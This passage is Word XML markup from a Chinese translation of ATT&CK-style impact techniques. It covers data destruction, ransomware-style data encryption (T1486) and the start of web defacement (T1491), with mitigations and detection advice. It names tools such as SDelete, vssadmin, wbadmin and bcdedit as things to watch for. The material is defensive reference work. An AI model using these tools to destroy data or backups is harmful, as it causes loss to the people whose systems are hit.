              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容灾计划，包括可用于恢复组织数据的定期数据备份过程。确保备份数据存储在系统之外并且受到保护，以防攻击者使用常见方法访问、破坏并阻止备份数据恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27A8302E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4D258E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6B869" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>监控来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>据破坏活动相关二进制文件的执行和命令行参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDelete</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控可疑文件的创建以及异常文件修改活动。特别是，请在用户目录和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下查找是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件修改活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD8FDA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了恶劣影响而数据加密</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="64B77F43" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748473D6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1486</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185CCA30" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC54737" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D49D02A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>所需权限：用户，管理员，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C3A42A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：内核驱动程序，文件监控，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="137DAEFC" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57AEB736" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E9A15B6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283FE84C" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会加密目标系统或网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据，从而中断系统和网络资源的可用性。他们可以尝试通过加密本地和远程驱动器上的文件或数据并扣留解密密钥的访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来使得存储的数据不可访问。这样做可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了让</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击者提供金钱补偿来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换取解密或解密密钥（勒索软件），或者在密钥未被保存或传输的情况下使得数据永久不可访问。如果攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勒索软件，常见的用户文件如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、图像、视频、音频、文本和源代码文件，都会被加密。某些情况下，攻击者可能会加密关键系统文件、磁盘分区和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF64C8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了最大限度地影响目标组织，设计用于加密数据的恶意软件可能具有类似蠕虫的功能，通过利用其他攻击技术（如有效帐户、凭据导出、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>管理员共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）在网络上传播。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678A16D5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="4752B9B4" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="379AE2D7" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4BFD1671" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="3FA21A5E" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BAB0143" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId258" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>数据备份</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5C3D21" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容灾计划，包括可用于恢复组织数据的定期数据获取和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过程。确保备份数据存储在系统之外并且受到保护，以防攻击者使用常见方法访问、破坏并阻止备份数据恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48DA59E5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB7868C" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB19954" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>监控来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>据破坏活动相关二进制文件的执行和命令行参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>vssadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>wbadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>bcdedit</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。监控可疑文件的创建以及异常文件修改活动。特别是，请在用户目录下查找是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件修改活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53F7B8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些情况下，监控异常的内核驱动程序安装活动可以帮助检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22531D45" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>网页置换攻击</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="70FE8B73" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6996A838" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1491</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C06979" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179B2DD6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="373A2D48" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>应用防火墙日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE7E205" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：完整性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D6C2DD" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70389B95" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B5970B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会修改企业网内外的可视内容，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>目的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递消息，恐吓或获取（可能是欺骗）信任来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>入侵系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F705AD6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459956A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会针对组织</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>内部系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施网页置换</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击来恐吓或误导用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>内容或置换桌面壁纸。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令人</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不安或反感的图像</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>引起用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不适</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>迫使</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
